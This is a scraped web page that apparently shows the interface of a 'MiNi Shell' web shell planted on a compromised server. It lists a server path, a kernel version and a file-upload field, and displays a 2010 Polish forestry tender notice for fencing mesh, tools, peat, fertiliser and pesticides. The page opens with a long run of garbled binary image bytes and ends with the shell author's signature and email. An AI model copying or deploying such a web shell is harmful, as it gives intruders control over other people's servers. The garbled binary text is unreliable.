JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101117/327251-N-2010.html

<p class="kh_header"><b>Toruń: Dostawa siatki do grodzenia upraw leśnych, drabin, sprzętu ogrodniczego, torfu, perlitu, nawozów i środków ochrony roślin na potrzeby projektu Realizacja programu ochrony restytucji cisa pospolitego (Taxus Baccata L) na obszarze RDLP w Toruniu współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Infrastruktura i Środowisko - drugi przetarg</b><br>
<b>Numer ogłoszenia: 327251 - 2010; data zamieszczenia: 17.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Lasów Państwowych w Toruniu , ul. Mickiewicza 9, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6584348, 6564334, faks 056 6224407.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa siatki do grodzenia upraw leśnych, drabin, sprzętu ogrodniczego, torfu, perlitu, nawozów i środków ochrony roślin na potrzeby projektu Realizacja programu ochrony restytucji cisa pospolitego (Taxus Baccata L) na obszarze RDLP w Toruniu współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Infrastruktura i Środowisko - drugi przetarg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
Część I:
zakup i dostawę siatki do grodzenia upraw leśnych o wysokości 2,0 m w łącznej ilości 79 300 mb wg poniższego zestawienia:

1	Brodnica-	13550;
3	Czersk-1900;
4	Dąbrowa-1700;
7	Golub Dobrzyń-2550;
9	Jamy-16300;
11	Osie-4500
12	Przymuszewo-2800;
13	Różanna-6650;
14	Runowo-3600;
15	Rytel-2600;
19	Tuchola-2150;
21	Zamrzenica-6100;
22	Żołędowo	-4200;
23	Lutówko-5900;
25	Woziwoda-2300;
28	Trzebciny-2500	
do magazynu położonego na terenie bazy nadleśnictw wymienionych w powyższej tabeli. 
Dane techniczne 1000 mb siatki dla Nadleśnictwa Żołędowo (dostawa w roku 2011):
Wysokość siatki	2,0m tolerancja +/- 10cm
Odstęp między drutami pionowymi	do 15cm
Ilość drutów poziomych	min. 22
Odstęp między drutami poziomymi	do wys. 0,5m: do 6cm
na wysokości 0,5 - 1,0m: do 12cm
pozostałe odcinki: co 15 - 20cm
Średnice drutów poziomych skrajnych (drut górny, drut dolny)	2,5mm tolerancja +/- 5%
Średnice pozostałych drutów wypełniających	2,0mm tolerancja +/- 5%
Warstwa powłoki cynku dla drutów poziomych powyżej	niemniej niż 200g/m2
Warstwa powłoki cynku dla drutów pionowych powyżej	niemniej niż 200g/m2
Minimalna wytrzymałość na rozciąganie drutów poziomych (RM)	niemniej niż 1100N/mm2
Minimalna wytrzymałość na rozciąganie drutów pionowych (RM)	niemniej niż 450N/mm2
Łączenie oczek	Zgrzew lub splot niemniej niż dwukrotny

Dane techniczne dla pozostałych dostaw siatek (łącznie 78300mb) 
Wysokość siatki	2,0m tolerancja +/- 10cm
Odstęp między drutami pionowymi	do 30cm
Ilość drutów poziomych	min. 17
Odstęp między drutami poziomymi	do wys. 1,0m: do 10cm
pozostałe odcinki: co 15 - 20cm
Średnice drutów poziomych skrajnych (drut górny, drut dolny)	2,5mm tolerancja +/- 5%
Średnice pozostałych drutów wypełniających	2,0mm tolerancja +/- 5%
Warstwa powłoki cynku dla drutów poziomych powyżej	niemniej niż 200g/m2
Warstwa powłoki cynku dla drutów pionowych powyżej	niemniej niż 200g/m2
Minimalna wytrzymałość na rozciąganie drutów poziomych (RM)	niemniej niż 1100N/mm2
Minimalna wytrzymałość na rozciąganie drutów pionowych (RM)	niemniej niż 450N/mm2
Łączenie oczek	Zgrzew lub splot niemniej niż dwukrotny

Część II:
zakup i dostawę niżej wymienionych narzędzi :
Zakup drabin trzyelementowych aluminiowych przeznaczonych do zbioru nasion cisa z drzew stojących z elementami mocującymi do drzewa i pasami zabezpieczającymi o wysokości nie mniejszej niż 15 m	ogółem	szt.2 Zamrzenica	szt.	1	
Woziwoda	szt.	1	
							
Zakup szpadli (o jakości nie gorszej niż Fiskars lub równoważne)	
ogółem	szt.	4		
Woziwoda	szt.	2		
Żołędowo	             szt.	2	
Zakup sekatorów (o jakości nie gorszej niż Garden lub równoważne)  	
ogółem	szt.	4		
Żołędowo	szt.	4	
Część III:
zakup i dostawę niżej wymienionych nawozów, torfu i środków ochrony roślin:
Zakup perlitu drobnego o frakcji nie mniejszej niż 2,5 mm
 i nie większej niż 5,0 mm                 	ogółem	l	5000		
Zamrzenica	l	1000		
Żołędowo  	l	4000		
Zakup substratu (torfu) o pH nie mniejszym niż 4,5 i nie większym niż 5,5
ogółem                 mp	250		
Zamrzenica	mp	50		
Żołędowo 	mp	200		
Zakup uniwersalnego  nawozu z mikroelementami,  granulowanego w workach po 25 kg *	ogółem	kg	400		
Żołędowo	             kg	400		
Zakup środków ochrony roślin, w tym:
Środek grzybobójczy granulowany - 80 kg** w opakowaniach po 5 kg
Środek owadobójczy i przędziorkobójczy - 40 l*** w opakowaniach po 5 l 
Środek grzybobójczy pylisty - 80 kg**** w opakowaniach po 5 kg	
*  Nawóz uniwersalny zawierający takie składniki, jak azot, potas i  fosfor w formie granulatu, pakowany w workach po 25 kg - np. Azofoska lub równoważny,
** Środek grzybobójczy w formie granul do sporządzania zawiesiny wodnej 
o działaniu kontaktowym do stosowania zapobiegawczego lub interwencyjnego w ochronie roślin rolniczych, sadowniczych, warzywnych, ozdobnych oraz leśnych przed chorobami grzybowymi, dopuszczony do stosowania w leśnictwie -  
np. Polyram lub równoważny.
*** Środek przędziorkobójczy i owadobójczy w formie koncentratu do sporządzania emulsji wodnej, o działaniu kontaktowym i żołądkowym, przeznaczony do zwalczania przędziorków oraz innych szkodników ssących, gryzących i minujących w roślinach rolniczych, sadowniczych, warzywnych, ozdobnych i zielarskich oraz w leśnictwie,
na rośliny działający powierzchniowo, dopuszczony do stosowania w leśnictwie -  np. Talstar lub równoważny.
**** Środek grzybobójczy w formie proszku do sporządzania zawiesiny wodnej 
o działaniu kontaktowym do stosowania zapobiegawczego w ochronie roślin sadowniczych, warzywnych, ozdobnych i leśnych przed chorobami grzybowymi, dopuszczony do stosowania w leśnictwie - np. Sadoplon lub równoważny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających polegających na rozszerzeniu dostawy o wartości nie większej niż 20% zamówienia podstawowego 
w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.31.31.00-8, 44.42.32.00-3, 44.51.11.10-9, 44.51.12.00-7, 09.11.22.00-9, 24.44.00.00-0, 24.45.70.00-2, 24.45.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium na część I zamówienia
Ustala się wadium dla  I części zamówienia w wysokości: 4 000,00 zł, (słownie: cztery tysiące złotych 00/100).
Dla II i III części zamówienia Zamawiający nie wymaga wniesienia wadium.

2. Wykonawca wnosi wadium:  a) w pieniądzu, sposób przekazania: przelewem na rachunek bankowy zamawiającego
Nr konta 61 1090 1506 0000 0000 5002 0525 prowadzony przez BZ WBK S.A.  O/Toruń z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy wpłata: 

Przetarg nieograniczony - Dostawa siatki do grodzenia upraw leśnych, drabin, sprzętu ogrodniczego, torfu, perlitu, nawozów i środków ochrony roślin na potrzeby projektu Realizacja programu ochrony restytucji cisa pospolitego (Taxus Baccata L) na obszarze RDLP w Toruniu  część I zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I zamówienia:
Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie. 
Zamawiający uzna warunek za spełniony, jeżeli wykaz będzie zawierać min. 1 dostawę siatki o podobnym przeznaczeniu i wartości nie mniejszej niż 100 tys. zł netto.
Dla części III zamówienia:
Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie. 
Zamawiający uzna warunek za spełniony, jeżeli wykaz będzie zawierać min. 1 dostawę środków  o podobnym przeznaczeniu i wartości nie mniejszej niż 25 tys. zł netto.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I zamówienia:
Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że jest ubezpieczony na kwotę co najmniej 100 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i załączniki:
1)	Formularz ofertowy - wypełniony i podpisany przez wykonawcę - zał. nr 1,
2)	Formularz cenowy - wypełniony i podpisany przez wykonawcę - zał. nr 2
3)	Oświadczenie, zgodnie z art. 44 o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt. 1 - 4 ustawy z wykorzystaniem wzoru - załącznik nr 4 do niniejszej specyfikacji (jeżeli oferta jest składana wspólnie przez kilka podmiotów, oświadczenie niniejsze powinno być złożone, jako jedno i podpisane przez wszystkich partnerów lub ich pełnomocnika),
4)	Warunki gwarancji - załącznik nr 6,
5)	Wykaz osób do kontaktów z Zamawiającym - załącznik nr 7</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje wprowadzenie istotnych zmian do umowy w zakresie terminu jej realizacji, jeżeli termin ten, z przyczyn nieprzewidzianych i niezależnych od Wykonawcy nie będzie mógł być dotrzymany. 
Ponadto dla części I oraz III zamówienia, tj dla zakupu siatki oraz nawozów i środków ochrony roślin, Zamawiający przewiduje wprowadzenie zmian do umowy w przypadku planowanej zmiany stawek podatku od towarów i usług VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.torun.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalna Dyrekcja Lasów Państwowych w Toruniu, ul. Mickiewicza 9, 87-100 Toruń, pokój nr 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2010 godzina 12:00, miejsce: Regionalna Dyrekcja Lasów Państwowych w Toruniu, ul. Mickiewicza 9, 87-100 Toruń, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 24.12.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu Operacyjnego Infrastruktura i Środowisko..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa siatki do grodzenia upraw leśnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i dostawa siatki do grodzenia upraw leśnych o wysokości 2,0 m w łącznej ilości 79 300 mb wg poniższego zestawienia:

1	Brodnica		13550
3	Czersk		1900
4	Dąbrowa		1700
7	Golub Dobrzyń		2550
9	Jamy		16300
11	Osie		4500
12	Przymuszewo		2800
13	Różanna		6650
14	Runowo		3600
15	Rytel		2600
19	Tuchola		2150
21	Zamrzenica		6100
22	Żołędowo		4200
23	Lutówko		5900
25	Woziwoda		2300
28	Trzebciny		2500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.31.31.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa drabin i sprzętu ogrodniczego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup drabin trzyelementowych aluminiowych przeznaczonych do zbioru nasion cisa z drzew stojących z elementami mocującymi do drzewa i pasami zabezpieczającymi o wysokości nie mniejszej niż 15 m w ilości 2 szt przeznaczonych dla nadleśnictw Zamrzenica i Woziwoda,
Zakup szpadli (o jakości nie gorszej niż Fiskars lub równoważne) w ilości 4 szt dla Nadleśnictwa Żołędowo,
Zakup sekatorów (o jakości nie gorszej niż Garden lub równoważne w ilości 4 szt dla Nadleśnictwa Żołędowo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.42.32.00-3, 44.51.11.10-9, 44.51.12.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa perlitu, torfu nawozów i środków ochrony roślin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup perlitu drobnego o frakcji nie mniejszej niż 2,5 mm
 i nie większej niż 5,0 mm  w ilości 5000 l,
Zakup substratu (torfu) o pH nie mniejszym niż 4,5 i nie większym niż 5,5 w ilości 250 mp,
Zakup uniwersalnego  nawozu z mikroelementami,  granulowanego w workach po 25 kg w ilości 400 kg,
Zakup środków ochrony roślin, w tym:
Środek grzybobójczy granulowany - 80 kg w opakowaniach po 5 kg
Środek owadobójczy i przędziorkobójczy - 40 l w opakowaniach po 5 l 
Środek grzybobójczy pylisty - 80 kg w opakowaniach po 5 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.22.00-9, 24.44.00.00-0, 24.45.70.00-2, 24.45.20.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com